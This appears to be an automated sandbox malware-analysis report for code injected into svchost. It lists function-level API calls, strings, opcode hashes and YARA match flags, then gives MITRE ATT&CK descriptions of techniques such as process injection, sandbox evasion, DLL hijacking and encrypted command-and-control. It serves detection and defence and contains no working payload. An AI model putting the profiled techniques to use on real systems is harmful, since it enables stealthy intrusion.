Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72D1A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09616f116c76c443f8290aefc138d82f161a33965460860d2ed68a7a49f6fe90
Instruction ID: e659ed2f4a43748d158e3d046cf7857f52ee9467e992505d9c5e0c07a3cf8ef4
Opcode Fuzzy Hash: 09616f116c76c443f8290aefc138d82f161a33965460860d2ed68a7a49f6fe90
Instruction Fuzzy Hash: B290023220100853D511B3584604707000987D0245FD1CC66A0418558DE766C952F121

Uniqueness

Uniqueness Score: -1.00%

Function 03B72CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72CFA

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ffecf5e423a62ca35aa5b5c732ccefdc3cc86ed881d00e2c23fb77c97e6eafe
Instruction ID: 5d2b3b308edbfaf6795bffa28df65fe3710386ec7118e4b8aa9ee22dfae522a8
Opcode Fuzzy Hash: 1ffecf5e423a62ca35aa5b5c732ccefdc3cc86ed881d00e2c23fb77c97e6eafe
Instruction Fuzzy Hash: 0A900222242045935945F3584504507400697E02457D1C866A1408950CD636D856E621

Uniqueness

Uniqueness Score: -1.00%

Function 03B72C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72C3A

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a404699b4c6a7fdf21b0fad7a6d227ef49904028ff5b6af2c28159e5493429e
Instruction ID: b60b7fc03a65382e2ae40a651665fa5077a73de214a9e4b30245da2ef0725198
Opcode Fuzzy Hash: 0a404699b4c6a7fdf21b0fad7a6d227ef49904028ff5b6af2c28159e5493429e
Instruction Fuzzy Hash: 2190022A21300443D580B358550860A000587D1206FD1DC69A0009558CDA25C869A321

Uniqueness

Uniqueness Score: -1.00%

Function 02D97300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D973A8

Strings

net.dll, xrefs: 02D97371, 02D973F7, 02D973CF, 02D973DB, 02D97403
wininet.dll, xrefs: 02D9735E, 02D97367

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: e437c4b4cce030e79526a53dc8b3352d3d5139c5a698738eee0fd639da684631
Instruction ID: 090260c9a1bd71fc869d3999d6c60169d04717718d3611469dcf377037e9f1c0
Opcode Fuzzy Hash: e437c4b4cce030e79526a53dc8b3352d3d5139c5a698738eee0fd639da684631
Instruction Fuzzy Hash: 11316FB6641700ABDB15EF64C8A0FABB7B9EF88700F00851DFA599B345D730A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D972FE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D973A8

Strings

net.dll, xrefs: 02D97371, 02D973CF, 02D973DB
wininet.dll, xrefs: 02D9735E, 02D97367

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 31b23e189fcd82aaa3c0e6aa7c8f8adeef6eeff0c5c95345a6f633c5b82985c1
Instruction ID: 3be719985b9c51499695ce6e1286df8adace50b6955741c0799777c9199f1c4a
Opcode Fuzzy Hash: 31b23e189fcd82aaa3c0e6aa7c8f8adeef6eeff0c5c95345a6f633c5b82985c1
Instruction Fuzzy Hash: 4B21A2B2941200ABDB14EF64C8A1FABBBB4EF48700F00811DF9599B341D770A855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D988E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D83B93), ref: 02D9891D

Strings

.z`, xrefs: 02D9890C, 02D98918

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
Instruction ID: d1e3a6305633a2e227e1c5dd5dd1767475fee46fe1704abbf1de4846d7b9999f
Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
Instruction Fuzzy Hash: 24F06DB1200218ABDB18DFA8DC49EEB37A9EF84790F118598FD486B241C631E914CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D988F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D83B93), ref: 02D9891D

Strings

.z`, xrefs: 02D9890C, 02D98918

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 03839cdedb7178037d24520e2c018ee8e0dc47dc668bca82e13300254c6b9b1e
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 3CE012B1200208ABDB18EF99CC48EA777ADEF88750F018558FA086B251C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D87280, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D872DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D872FB

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
Instruction ID: 49efd7e3bb288d36e7310850b01079fcd8d4e736463e30764165a5a8f724a5c1
Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
Instruction Fuzzy Hash: 1601A732A8022977EB21B6949C42FFE776C9B41B51F144114FF04BA2C0EA946D058AF6

Uniqueness

Uniqueness Score: -1.00%

Function 02D989F5, Relevance: 1.6, APIs: 1, Instructions: 57
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D989B4

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
Instruction ID: b4fd105c0091a299ed3edaa07e38d4f955c101044228526b2c58277fb1695143
Opcode Fuzzy Hash: 558c73087d880e6b38b06aeba6b12e23934193b87adee1dac964df1075fddadc
Instruction Fuzzy Hash: 4111A2B6204208AFCB14DF89DC91EEB73ADEF8C754F118658FA4997240C630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D89B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D89BB2

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 233f666782c3736f0f523edeeb1d57206d1782d34a9607759b18f5a8836ba0f7
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 54010CB6D0020DBBDF10EAA4DC81FEEB3799B54608F004195A90897384F631EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D98960, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D989B4

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 07f2aa06d04ad3d58b2093bc15af22fe68c0f739398f1ab18cfef48bf9959472
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7C01AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7250C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D89B34, Relevance: 1.5, APIs: 1, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D89BB2

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
Instruction ID: 2f8039949fcf5fc60a2acb7a2e0768700cfcf1ae78108d3be9b6a473c9afb28a
Opcode Fuzzy Hash: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
Instruction Fuzzy Hash: 3FF068B6E4010DABDF10DAD4D851FEDB3789B05304F008195ED1C9B381F670EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02D97430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D8CCF0,?,?), ref: 02D9746C

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
Instruction ID: 1b0b2d117b54647f44d1063226fc8200d8c3a8b52502b0ad0048bb64f81a3d0f
Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
Instruction Fuzzy Hash: 04E092733903043AEB3065ED9C02FA7B39DCB82B24F550026FA4DEB2C1D595FC0186A4

Uniqueness

Uniqueness Score: -1.00%

Function 02D98A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D8CFC2,02D8CFC2,?,00000000,?,?), ref: 02D98A80

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ab6504e7fce03c31bee46a09d9e55032d5f56e4c0c2ae8ec220cf4beccd7f399
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A2E01AB12002086BDB10DF89CC84EE737ADEF88650F018154FA0867241C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D988B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D93536,?,02D93CAF,02D93CAF,?,02D93536,?,?,?,?,?,00000000,00000000,?), ref: 02D988DD

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: c4cd0262d1a1e68f6c3ffa87224698791dac7602f9c71537fd526932e424a8fe
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 3FE012B1200208ABDB14EF99CC44EA777ADEF88650F118558FA086B241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D8D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02D87C83,?), ref: 02D8D45B

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 3110206135378eeeb8f4a54b00aab332ed9c2b68f0da8c4be86c2a340d3717b1
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 8CD05E717503042AEB10BAA89C02F26328D9B45A44F494064FA48963C3DA50E8008561

Uniqueness

Uniqueness Score: -1.00%

Function 02D8D42F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02D87C83,?), ref: 02D8D45B

Memory Dump Source

Source File: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d80000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
Instruction ID: 7a1c3058fd97317ebf84565b65a02b63e4c0ab6906a2ba3e2230f00007159791
Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
Instruction Fuzzy Hash: ADD05E717403043AEB10FAB49C02F6A27999F56644F0941A8F949E73C3DA51D8018620

Uniqueness

Uniqueness Score: -1.00%

Function 03B72B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B72B44

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3672c55ba6dab9874fd28334c4339465d9bf608bc8ea0fe0d9aa252a0726653
Instruction ID: 96a77ec4b43acc41485d831789b49a034b54e0dcca960286f402e46786e9c2b1
Opcode Fuzzy Hash: c3672c55ba6dab9874fd28334c4339465d9bf608bc8ea0fe0d9aa252a0726653
Instruction Fuzzy Hash: C2B09B729014C5C6DE11E760470C7177904E7D0705F55C8F5D1564651F8738D091F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03B67550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 03BA4592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BA454D
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BA4530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BA4507
Execute=1, xrefs: 03BA451E
ExecuteOptions, xrefs: 03BA44AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BA4460

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: bac407a0f58a8d642d88bb1c8a80feaae7120721ee77535be06a28e8f0197c14
Instruction ID: d3f7d536b5dbb58cc37b1ca22e9826d76295730379fcdc942b438ff46d0a610c
Opcode Fuzzy Hash: bac407a0f58a8d642d88bb1c8a80feaae7120721ee77535be06a28e8f0197c14
Instruction Fuzzy Hash: 0451D931A00719AAEF10EAA9EC96FAD7368EF0470CF0404F9E515AB292DF749A45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03B39046, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@w9v, xrefs: 03B9245B
$, xrefs: 03B390B1
@, xrefs: 03B39095

Memory Dump Source

Source File: 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, Offset: 03B00000, based on PE: true

Associated: 0000000B.00000002.11092177690.0000000003C29000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $$@$@w9v
API String ID: 0-1706906297
Opcode ID: fc1a939b3fc50092ac77b50d9765fecfc4d70be35dabbb7617fc1644ab35bdfc
Instruction ID: 3d38baa1bb969a696eb5d5d879eded8cc3e56f25170b43a74cfc0db13bd2052e
Opcode Fuzzy Hash: fc1a939b3fc50092ac77b50d9765fecfc4d70be35dabbb7617fc1644ab35bdfc
Instruction Fuzzy Hash: D5812C76D002699BDB31DB54CC44BEEB7B8AF49714F0445FAAA19BB240D7705E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

